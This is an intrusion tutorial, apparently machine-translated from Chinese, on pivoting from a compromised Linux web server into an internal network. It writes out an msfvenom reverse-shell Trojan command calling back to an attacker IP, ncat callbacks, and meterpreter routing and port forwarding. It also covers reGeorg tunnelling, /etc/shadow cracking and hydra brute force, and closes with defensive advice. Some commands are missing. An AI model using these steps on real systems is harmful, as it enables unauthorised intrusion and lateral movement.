playing linux system Linux intranet penetration

Nothing great was ever achieved without enthusiasm
No enthusiasm can’t make great achievements

There is a lot of information about intranet penetration on the Internet. I also read a lot of information before I did the test. This article highlights linux, because this test does not involve windows system, of course, the principle of linux and windows intranet penetration is similar, but the tools used are different.

Collecting test network environment

When we get a target intranet server, or broiler server, the first thing to do is to collect information. One of the most important things that I think needs to be collected is the network environment of broilers.

lab environment

First introduce the server environment of this test:

  • Attack machine Mac: 110.xx.xx.xx external network
  • Broiler centos: 192.168.16.x target intranet 16 network segment system
  • Intranet penetration range: Target intranet 17 network segment system

This test simulation assumes that the vulnerable web application is open to the broiler server and is embedded in the webshell.
The purpose of this test: through the shell on the broiler server, deep penetration of the server on the network segment of the intranet 17.

What network data is collected and tested?

Ok, I currently have a shell for broilers, so what network environment should I collect for broiler servers? How to test? I think at least the following network environment information should be collected:

  • Connectivity of the broiler server to the external network
  • Connectivity of the broiler server to other network segments on the intranet
  • Is there a port access restriction between the broiler server and the external network?
  • Is there a port access restriction between the broiler server and other network segments on the intranet?

Note: Connectivity mainly refers to the ability to ping, and both parties need to ping each other; port access restrictions refer to whether there is a bastion machine or firewall on the target network boundary, and whether there are restrictions on the ports that enter or leave.

Port Access Limit Test

The ping test is not introduced here. It mainly explains how to test the port access restrictions. The tools that can be used are as follows:

  • curl, wget (can connect web services, mainly 80, 443, 8000 + ports)
  • telnet (actively connect to the specified port of the specified ip)
  • nmap (scannable port, open or filter)
  • ncat (can create port listener, you can also connect actively)
  • python (can actively create port listeners)

Before testing port access restrictions, we need to figure out the current network environment. In this test, the attacker is on the external network and the broiler is on the intranet. Therefore, under normal circumstances, the attacker cannot directly access a port on the broiler (requires network border router to do port mapping).

Reverse connection test

When testing port access restrictions, we can first use ncat to listen on a port on the attacker.

ncat -l -p 9999

Then use ncat or telnet tools to try to connect on the broiler, which I call the reverse connection test.

ncat 110.xx.xx.xx 9999

Note: The listening port can be randomly selected. Try to select multiple ports to try multiple times. If the broiler can access any port of the attacking machine, the target network boundary does not limit the connection in the outbound direction. Know the information on the port behind it. Forwarding has great benefits.

Forward connection test

We can also listen to a port on the broiler, try to connect on the attack machine (here is the ip address of the broiler’s external network, the web application open to the broiler must be in the form of an external network ip or domain name, and the ip is in this In the second test, it is not the real ip address of the broiler, it is the ip of the target border network device. The principle is to map the web port on the network device (outside network ip) to the web port of the broiler (intranet ip) through port mapping) I call this a forward connection test.
Trying to connect to the port of the broiler’s external network address means that some careless administrators will set up full port mapping on the network device, which means that any port on the broiler can be mapped to the same port on the network edge device, then this is the same as the broiler. The server is directly on the external network and there is no difference.

Collecting server information

Collecting information can be said to be the first step of penetration testing. The intranet penetration is also the same. The more server information collected, the greater the success rate of penetration.

Viewing the system kernel

View the kernel version on the Linux system as follows:

The general system's intrusion path is to first raise the right, and the power can be raised through the Linux kernel vulnerability, so you can first check the Linux kernel version, and then according to the kernel [search for the exp website] ( ), upload exp to lift the right. Since this test does not involve the promotion of the right part, so do not test, add another sentence: the kernel has a risk of downtime, please be cautious.
#### View operating system digits
The number of views on the linux system is as follows:
getconf LONG_BIT

Description: Knowing whether the system is 32-bit or 64-bit is useful for generating msf Trojans later.

System sensitive information

Collect some system-related sensitive information, such as account passwords, logs, history commands, ssh files, and so on.

/ Var / log

web sensitive information

If the web application exists on the server, you can check whether there is sensitive information in the web directory, such as the configuration file connecting to the database.

Intranet scanning

After the information collection is complete, you can try to scan the internal network machines, such as host survival scan, port scan, arp scan, and so on. Port scanning can use tools such as nmap and msf. However, if these tools are not installed on the server, there are usually three ways to achieve intranet port scanning. The first one is to install the scanning tool on the server. It is not recommended or recommended here, because it is very complicated and troublesome (of course, you can upload the script of the python scan port, it is convenient to compile and install.) The second is port forwarding. The server intranet port is forwarded to the external network for scanning; the third is proxy scanning, that is, the attacking machine equipped with the scanning tool is proxied to the target intranet environment.
Whether it is port forwarding scanning or proxy scanning, the principle is to open up the connectivity between the attacking machine (external network) and the broiler (intranet), that is, the attacking machine can directly access the intranet resources where the broiler is located. The connection here does not rely on the port mapping function of the target network edge device, so it is different from the connection generated by the attacker accessing the broiler web service.

Port Forwarding

In order to achieve the “direct” connection described above, we need an intermediate bridge to pass data between the internal and external networks (attackers and broilers). There are many ways to build such a bridge. We can first think of port forwarding, that is, forwarding a port on the broiler server to a port on the attack machine, so that accessing a port on the attack machine is equivalent to accessing. A port on the broiler server.

Port forwarding tools: lcx, meterpreter, etc., the specific usage will be introduced later
Port forwarding type: tcp port forwarding, http forwarding, ssh forwarding, etc.

tcp port forwarding

Local forwarding: The attacker monitors 2222 and 3333 ports, and the broiler connects to the 2222 port of the attacker and forwards the broiler 22 port.
Forward connection principle:

Broiler 22 port <--> broiler random high port <--> broiler random high port <--> attacker 2222 high port <--> attack aircraft random high port <--> attack machine 3333 port

Note: At this point we connect to the 3333 port of the attack machine, which is equivalent to the 22 port connected to the broiler.

Remote forwarding: The attacker monitors ports 2222 and 3333, and the broiler connects to port 2222 of the attacker and forwards the port 22 of the intranet target server. (provided that the broiler can connect to port 22 of the target server)
Forward connection principle:

Intranet target server 22 port <--> broiler random high port <--> broiler random high port <--> attacker 2222 high port <--> attacker random high port <--> attack machine 3333 port

Note: At this point we connect to the 3333 port of the attack machine, which is equivalent to the 22 port connected to the target server.
Note: From the above connection process, it is easy to see that port forwarding is more difficult to prevent because the port on the attacker is random and unpredictable, so it is impossible to make a port policy in the direction of the bastion machine or firewall. Unless the server is forbidden to access all external ports (in reality, most of the restrictions on port connections in the forward direction).

http forwarding

Some administrators with strong security intentions will prohibit some servers from accessing the external network, that is, the server is prohibited from connecting to any external network port. At this point, the normal tcp port forwarding has no effect, because the premise of forwarding is to be able to connect to each other. In this case, you can use http forwarding.
Forward connection principle:

Broiler web port (80) <--> network border device port (80) <--> attacker random port

Note: The reason for this connection is the web service on the server and the mapping function of the network boundary device.

Note: Although the broiler can not access any port on the external network, as long as it provides external web services, it can communicate with the outside world, but this communication is limited to the web service port, and the broiler does not directly communicate with the attack aircraft. It is the use of border devices.

Agent Scanning Intranet

The above describes the use and principle of several port forwarding. From which we can see that port forwarding is powerful, but it is also very limited, because each port can only forward one port of ip. For scanning, it is not the best. Options. Therefore, there is a better technical solution - proxy scanning, the principle is similar to port forwarding, it is necessary to build a bridge, and this bridge is often not a port, but a shell or session.

Agent scanning can also be divided into tcp proxy scanning and http proxy scanning.

httpProxy Forwarding

If the target server has a web system, you can use Regeorg + proxychains.
Upload the reGeorg tunnel file to the broiler server to the website directory. The attacker executes:

Then modify the proxychains.conf configuration file
Vim /etc/proxychains.conf (on the ~/.proxychains/proxychains.conf on mac, do not create it yourself)

Add socks5 2333 in the last line (same port as regeorg)

Finally, when the attacker uses the scan tool, you can add proxhchains4 before the executed command, for example:

proxychains4 nmap -sT -Pn -n

Note: This scheme is suitable for both the attacker and the broiler server in their respective intranet environments. The attacker can access the http service of the target server and forward the proxy through the http service (slower speed).

tcp proxy forwarding

Idea: Use the metasploit Trojan to bounce a broiler’s meterpreter shell onto the attacker and then set up the route on the meterpreter shell. We can then scan the attacker directly on the network segment where the broiler is located (here it can be scanned across the network segment).

Generate msf Trojan

Generate Trojans:

Msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attacker ip LPORT=8000 -f elf > shell_8000.elf

Since the attacker cannot access the port of the broiler, the broiler can access the port of the attacker, thus generating a reverse Trojan.

Rebound shell

The attacker runs msfconsole, using the exoloit/multi/handler module, and the set payload linux/x86/meterpreter/reverse_tcp is the same as the payload used to generate the Trojan. LPORT is set to the port that the Trojan will connect to. After running, it will listen to a port on the attacker and wait for the Trojan link.
At this point, shell_8000.elf is uploaded to the broiler server. After adding the permission, the running Trojan will actively connect to the port monitored by the attacker and obtain a meterpreter shell on the attacker.

Setting up routing

In the previous step, a session was obtained. This session is a session in which the attacker and the broiler are connected to each other.
Check out the network of broiler chickens:

run get_local_subnets

Add a route:

View route:

In general, it is ok to set up the route here, but sometimes it will be found in the meterpreter, but it will be invalid in msf, so it can be set again in msf. (But the premise is that the meterpreter session should always exist) Put the session into the background and add the route to msf.
View route:

Here is already a good result, add a routing command:

Note: 12 indicates the session id. Since we need to access 17 network segments, we also need to add 17 network segments.
Description: The meaning of the above two routes is that if the attacker wants to access the resources of the 17 or 16 network segment, the next hop is session12. As for what is the next one, there is not much to say here. Anyway, the attacker can access the attacker anyway. Network resources.
Forward connection principle:
Attack machine <-->meterpreter_shell(session)<-->broiler # This is not a port concept, but a route

tcp global proxy forwarding

Through the above settings, you can access intranet resources in msf, but only in msf can be accessed. If you want other tools to use the proxy, you need to set the global proxy. This requires the socks4a tool proxy in the msf framework. The directory: auxiliary/server/socks4a, then with Proxychains, is similar to the http proxy.

Note: This proxy is not an http proxy. It is a tcp proxy. Therefore, the target server or the attacker server is required. If one party is in the external network environment, the Trojan port cannot be connected, and the meterpreter shell cannot be obtained.

Metasploit operation can refer to: [[Infiltration Artifact Series] Metasploit] (

Port Scanning Tool

It is recommended to use metasploit for tcp proxy forwarding, and use many scanning modules integrated on msf to directly scan.
Scan module:

  • auxiliary/scanner/portscan port scan
  • scanner/portscan/syn SYN port scan
  • scanner/portscan/tcp TCP port scan

In addition, you can also use nmap and other scanning tools, combined with tcp global proxy forwarding.

For 22-port intrusion

After scanning out the intranet server port, we can first select the open 22 port server for the intrusion attempt. Attacking port 22 usually has two methods. The first is to read the broiler plaintext password first, and then use the plaintext password to try to log in. The second is dictionary violent login.

Try hash cracking

If the permissions are sufficient, we can successfully read the contents of the /etc/shadow file, but it is ciphertext, so you can try to use the tool to crack.

Note: [mimikatz] ( can be used under windows.

Note: Obtaining the plaintext password of the linux account is very effective, because the internal network environment administrator may be several, and the passwords set by different servers may be the same, so you can use the obtained server password to try to log in to the remaining 22 ports. Intranet server.

Dictionary brute force

This is nothing to say, mainly depends on whether the dictionary is strong and whether there is a limit to prevent blasting.

  • hydra
  • corresponding module on msf

Intrusion against other ports

In addition to 22 ports, 21 (ftp), 3306 (mysql), 1433 (mssql), etc. can be brute-forced. So what about other segment ports? For example, 445, 443, etc., these can be attacked through the corresponding vulnerabilities, through the nessus scanner can be used to scan, the discovered vulnerabilities and then the corresponding modules on the msf attack.

Intrusion against web services

In addition to the above ports, there is a special type of port, which is the port of the web service class, such as 80, 443, 8000+. Because of the existence of web applications on these ports, web applications are vulnerable to vulnerabilities. Therefore, it is possible to focus on finding a server with a web service in the intranet, and infiltrating its web application according to the process of web penetration testing.

Counterattack of port forwarding

The port forwarding technique was introduced in the previous section, but I did not use it in the scanning process. So is it that port forwarding has no use in the penetration of the internal network?
This is not the case. The exploit phase after the intranet scan is the real stage for port forwarding. At this stage, we can use port forwarding to forward a port of a vulnerable server and use it separately. We can think of using lcx to forward 3389 ports in windows. It can also forward 22 ports under linux. Of course, it is better to forward 80 ports to reach the web service that can access the intranet locally, thus continuing the web penetration routine and expanding the attack. surface.

meterpreter implements port forwarding

In the meterpreter shell, type:

meterpreter> portfwd add -l 55555 -r -p 3306


Forward the 22 port of the broiler to the 2222 port of the attacker and see the connection.
It was found that the attacker listened on port 2222 and connected to a high port outside the machine.

The 22 port of the broiler is also connected to a high port of the broiler itself.

So how is the connection between the two high ports between the two servers, I think it is definitely using the meterpreter session. So the meterpreter session is equivalent to a middleman, passing messages that could not be delivered.

lcx port forwarding

Attack aircraft:

Lcx -listen 2222 3333 # 2222 is the forwarding port, 3333 is any unoccupied port of the machine


lcx -slave 2222 3389 is the attacker’s external network ip, 2222 is the forwarding port, is the broiler intranet ip, and 3389 is the remote terminal port.

Inner Net Sniffing

Cain can be used under windows, and modules in msf can be used under linux. Of course, under normal circumstances, it is best not to use the internal network to sniff, because the movement is too large, and may affect the intranet network.

linux intranet security advice

Speaking of so many intranet penetration routines, according to the convention, the recommendations for the safety construction of the intranet should be given. Of course, it is only a personal opinion, and can be discussed together.

  • Install monitoring software on each server to monitor and block the operation of Trojans (monitoring Trojan files and behavior)
  • Monitor the new port opened on the server, check its connection, and whether there is abnormal connection (monitor abnormal port)
  • The server updates the patch in time, as well as the latest system vulnerability patch (reduced vulnerability)
  • Apps running on the server give low privileges (increased difficulty in lifting rights)
  • It is not necessary to connect to the external network server, and it is forbidden to connect to the external network (to reduce the risk of being invaded)
  • Logging and real-time monitoring (monitoring abnormal operations and brute force behavior)

Reference article


[[Play linux series] Vim use] (
[[Play linux series] Linux basic commands] (
[[Play linux series] shell programming] (

本文标题:playing linux system Linux intranet penetration


发布时间:2017年08月09日 - 16:08

最后更新:2019年08月16日 - 15:08


许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

nmask wechat